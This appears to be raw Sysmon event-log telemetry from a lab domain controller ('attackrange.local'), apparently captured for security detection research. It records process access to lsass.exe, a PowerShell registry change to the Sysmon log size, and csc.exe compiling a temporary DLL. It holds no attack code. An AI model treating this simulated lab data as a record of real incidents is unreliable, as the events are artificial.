13:08:46.746{08A6967A-40DD-6000-0B00-000000009901}8683796C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000290Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:08:46.621{08A6967A-425D-6000-D502-000000009901}4932C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Sysmon/Operational\MaxSizeDWORD (0x12d2c000) 10341000x8000000000000000289Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:46.403{08A6967A-40DD-6000-0B00-000000009901}8683796C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:46.403{08A6967A-40DD-6000-0B00-000000009901}8683796C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:46.403{08A6967A-40DD-6000-0B00-000000009901}8683796C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x8000000000000000286Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:08:46.309{08A6967A-425E-6000-D702-000000009901}5088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\ui20gj2w.dll2021-01-14 13:08:46.199 10341000x8000000000000000285Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:46.293{08A6967A-425D-6000-D202-000000009901}45722460C:\Windows\system32\conhost.exe{08A6967A-425E-6000-D802-000000009901}4964C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:46.293{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000283Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:46.293{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000282Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:46.293{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000281Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:46.293{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000280Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:46.293{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000279Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:46.293{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000278Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:46.293{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000277Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:46.293{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000276Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:46.293{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000275Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:46.293{08A6967A-40D2-6000-0500-000000009901}644768C:\Windows\system32\csrss.exe{08A6967A-425E-6000-D802-000000009901}4964C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000274Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:46.293{08A6967A-425E-6000-D702-000000009901}50885100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{08A6967A-425E-6000-D802-000000009901}4964C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b181|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3d58|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3ed0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3fa6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+274e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27a0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+28e4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7e38f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45d22|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+448ef|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+445e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+44303|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18321|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+17b76|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+9e0d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1edf02|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000273Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:46.302{08A6967A-425E-6000-D802-000000009901}4964C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe12.00.52519.0 built by: VSWINSERVICINGMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RES1F52.tmp" "c:\Users\Administrator\AppData\Local\Temp\CSC132DB62C3DEE4436BB565314DA1DA0A2.TMP"C:\Users\Administrator\ATTACKRANGE\Administrator{08A6967A-425D-6000-7315-110000000000}0x1115730HighMD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF{08A6967A-425E-6000-D702-000000009901}5088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\ui20gj2w.cmdline" 10341000x8000000000000000272Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:46.199{08A6967A-425D-6000-D202-000000009901}45722460C:\Windows\system32\conhost.exe{08A6967A-425E-6000-D702-000000009901}5088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000271Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:46.199{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000270Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:46.199{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000269Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:46.199{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000268Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:46.199{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000267Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:46.199{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000266Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:46.199{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000265Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 